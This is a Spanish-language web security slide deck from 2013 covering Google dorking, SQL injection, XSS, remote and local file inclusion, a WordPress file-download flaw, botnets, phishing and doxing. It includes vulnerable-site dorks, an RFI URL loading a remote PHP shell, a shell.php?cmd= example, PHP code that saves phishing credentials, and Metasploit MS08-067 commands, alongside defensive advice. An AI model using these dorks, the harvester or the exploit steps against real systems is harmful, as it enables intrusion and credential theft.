WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 12
13. FOOTPRINTING
• GOOGLE HACKING (―inurl:‖, ―filetype:sql‖…)
• Herramientas que automaticen ―Anubis‖.
• Leer el código fuente!!!
• Errores 404
• IP reverse.
• Cuwhois, robtex.
• Metadatos.
• GoLismero - enlaces.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 13
14. GOLISMERO
• Aplicación en python
• Muestra todos los enlaces de una
web.
• Puede guardar los resultados.
• Detectar vulnerabilidades.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 14
15. VULNERABILIDADES
• Inyección SQL.
• XSS - Cross Site Scripting(persistente o reflejada).
• Persistente: inyecta código (script, iframe) maligno.
• Reflejada: modifica valores de la web que utiliza para variables. Robo de Cookies.
• RFI (inclusión remota de archivos)
• LFI (Local file inclusion)
• FPD (Full Puth Disclosure Vulnerability)
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 15
16. INYECCIÓN SQL
• En el nivel de validación de las entradas para realizar consultar a una base de datos no
verifica o filtra bien. Y podemos inyectar código malicioso.
• Podemos escalar privilegios.
• Podemos sacar las tablas, columnas y registros de la base de datos.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 16
18. RFI - INCLUSIÓN REMOTA DE ARCHIVOS
• Es posible debido aun error en la programación PHP, que hace que la web cargue un
determinado archivo que está contenido en una variable.
• <? include($_GET[’variable’]); ?>
• Dorks:
• inurl:/index.php?include=
• inurl:/index.php?pagina=
• Explotanción:
• http://<server>/typetest/index.php?link=http://<server>/<shellphp>
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 18
19. LFI – LOCAL FILE INCLUSIÓN
• Ejecutar código externo en la web victima.
• Subiendo un archivo malicioso a la misma.
• Nosotros usaremos una PHP SHELL.
• Digamos que LFI es que recibe un valor de entrada que recoge la variable cmd y es
ejecutado en el sistema mediante la llamada system de PHP.
• Podemos arreglarlo deshabilitando la llamada al sistema system en PHP
• Ejmplo:
• http://www.owned.com/imag/shell.php?cmd=ls
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 19
20. XSS - CROSS SITE SCRIPTING
• Usualmente no se validan correctamente los datos de entrada que son usados en
algunas aplicaciones permitiendo enviar un script malicioso a la aplicación.
• Para funcionar necesitan un punto de entrada, que suelen ser los formularios.
• A través de un ataque XSS, se puede secuestrar cuentas, cambiar
configuraciones de los usuarios, acceder a partes restringidas del sitio, modificar
el contenido del sitio, etc.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 20
23. WORDPRESS VULN
• Permite la descarga de archivos php • <? $download_file = $_GET['download_file'];
de la plataforma poniéndola en • $split_file = xplode('/',$download_file);
peligro. Imaginaros descargar el "wp- • $split_file_num = count($split_file);
config" del cms donde se encuentra • $my_section = $split_file_num-1;
toda la configuración a la base de
• $download_file_name =
datos de nuestra web. $split_file[$my_section]; header ("Content-
type: octet/stream");
• DORKS:
• header ("Content-disposition:
• inurl:download.php?download_file= &
• attachment;
inurl:wp-content
• filename=".$download_file_name.";")
• inurl:download.php?&path= & inurl:wp- • ; header('Content-type: application/pdf');
content
• header("Content-Length:
codigo de download.php:
• ".filesize($download_file));
readfile($download_file); exit; ?>
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 23
24. ¿QUÉ ES UNA BOTNET?
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 24
25. UNA BOTNET:
• Es una colección de software robots.
• Son maquinas infectadas que realizan acciones en conjunto de una manera centralizada.
• El artífice de la botnet puede controlar todos las maquinas infectadas de una forma
remota.
• IRC, HTTP. Incluso por SMS…
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 25
26. MEDIDAS PREVENTIVAS
• Usa un firewall.
• Usa un antivirus.
• Instala programas que sólo provengan de fuentes fiables.
• Evita abrir ejecutables de correos.
• Actualiza tu sistema y programas.
• Cuidado con los fakes o scams.
• Cuidado con dispositivos de almacenamiento externos.
• No activar el auto ejecutar de las descargas de los navegadores.
• Ser prudente y precavido.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 26
27. ESTAMOS EN UNA BOTNET???
• Usa el comando ―netstat‖: netstat –na conexiones entrantes
• Si el internet te va lento. Examina el trafico.
• Pasa un antivirus.
• Formatea.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 27
28. ¿QUÉ ES UN FAKE?
• Es una web clon de una pagina oficial con la intención
de robar los datos de un login (usuario, password, pin,
credenciales, etc)
• Es una técnica de phishing. Suelen engañarnos
atreves de correos o desde las redes sociales,
utilizando la ingeniería social.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 28
29. EJEMPLO DE FAKE 1
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 29
30. EJEMPLO DE FAKE 2
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 30
31. DETRÁS EN PHP
• <?php
• $login=$_POST["nombre"];
• $pass=$_POST["password"];
• $guardar = fopen("pass.txt",a); // funcion fopen abre el archivo pass.txt
• /* La funcion fopen tiene diferentes modos a= abre el archivo solo cuando se escribe, a+=abre
el archivo cuando se lee y se escribe*/
• fwrite($guardar,"
• usuario: ".$login."
• password: ".$pass);
• fclose($guardar); //cierra fopen
• echo "<META HTTP-EQUIV='refresh' CONTENT='1; url=http://websec.es'>";
• ?>
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 31
33. ¿QUÉ ES EL DOXING?
• Es el proceso de obtención de
información acerca de una persona a
través de fuentes de internet.
• Deriva de ―Document‖ y ―ing‖;
documentando.
• El sujeto o entidad de la búsqueda y
revelación de datos e información es
―TARGET‖
• El doxer para encontrar toda la
información posible es incluso de entrar
en base de datos gubernamentales o
viajar a la ciudad del objetivo.
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 33
34. METASPLOIT INTRUSIÓN WINDOWS XP SP3
NETAPI
• use windows/smb/ms08_067_netapi
• Show options
• Set RHOST ―ipvictima‖
• set payload windows/vncinject/bind_tcp
• Set lport 4444
• EXPLOIT
WWW.WEBSEC.ES // WWW.QUANTIKA14.COM 16-Feb-13 34